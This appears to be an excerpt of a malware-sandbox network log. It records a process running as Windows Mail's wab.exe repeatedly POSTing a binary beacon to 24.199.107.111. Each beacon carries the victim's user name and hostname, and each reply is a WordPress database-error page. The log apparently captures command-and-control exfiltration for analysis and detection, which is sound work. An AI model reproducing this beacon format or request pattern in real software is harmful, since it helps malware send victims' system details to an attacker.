                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:19.595098972 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:19.595412970 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.54974224.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:19.900784969 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:20.063131094 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:20.860709906 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:19 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:20.860739946 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:20.860761881 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.54974324.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:21.167396069 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:21.330594063 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:22.149931908 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:21 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:22.149962902 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:22.149980068 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.54974424.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:22.462651968 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:22.625289917 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:23.415919065 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:22 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 44 61 74 61 62 61 73 65 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 4f 78 79 67 65 6e 2d 53 61 6e 73 2c 20 55 62 75 6e 74 75 2c 20 43 61 6e 74 61 72 65 6c 6c 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 65 6d 20 61 75 74 6f 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 31 65 6d 20 32 65 6d 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 30 34 29 3b 0a 09 09 7d 0a 09 09 68 31 20 7b 0a 09 09 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 09 09 09 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 33 30 70 78 20 30 20 30 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 37 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 70 2c 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 2e 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 32 35 70 78 20 30 20 32 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c
                                                                              Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>Database Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 20px;}#error-page code {font-family: Consolas, Monaco,
                                                                              Apr 18, 2024 21:15:23.415956974 CEST1289INData Raw: 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 6c 20 6c 69 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09
                                                                              Data Ascii: monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid trans
                                                                              Apr 18, 2024 21:15:23.416014910 CEST115INData Raw: 22 65 72 72 6f 72 2d 70 61 67 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 64 69 65 2d 6d 65 73 73 61 67 65 22 3e 3c 68 31 3e 45 72 72 6f 72 20 65 73 74 61 62 6c 69 73 68 69 6e 67 20 61 20 64 61 74 61 62 61 73 65 20 63 6f 6e 6e 65
                                                                              Data Ascii: "error-page"><div class="wp-die-message"><h1>Error establishing a database connection</h1></div></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.54974524.199.107.111805496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Apr 18, 2024 21:15:23.725039959 CEST246OUTPOST /index.php/927339792 HTTP/1.0
                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                              Host: 24.199.107.111
                                                                              Accept: */*
                                                                              Content-Type: application/octet-stream
                                                                              Content-Encoding: binary
                                                                              Content-Key: F4173C58
                                                                              Content-Length: 153
                                                                              Connection: close
                                                                              Apr 18, 2024 21:15:23.887886047 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 36 00 32 00 32 00 35 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                              Data Ascii: (ckav.rualfons562258ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                              Apr 18, 2024 21:15:24.683196068 CEST1289INHTTP/1.0 500 Internal Server Error
                                                                              Date: Thu, 18 Apr 2024 19:15:23 GMT
                                                                              Server: Apache/2.4.59 (Debian)
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Content-Length: 2412
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=UTF-8
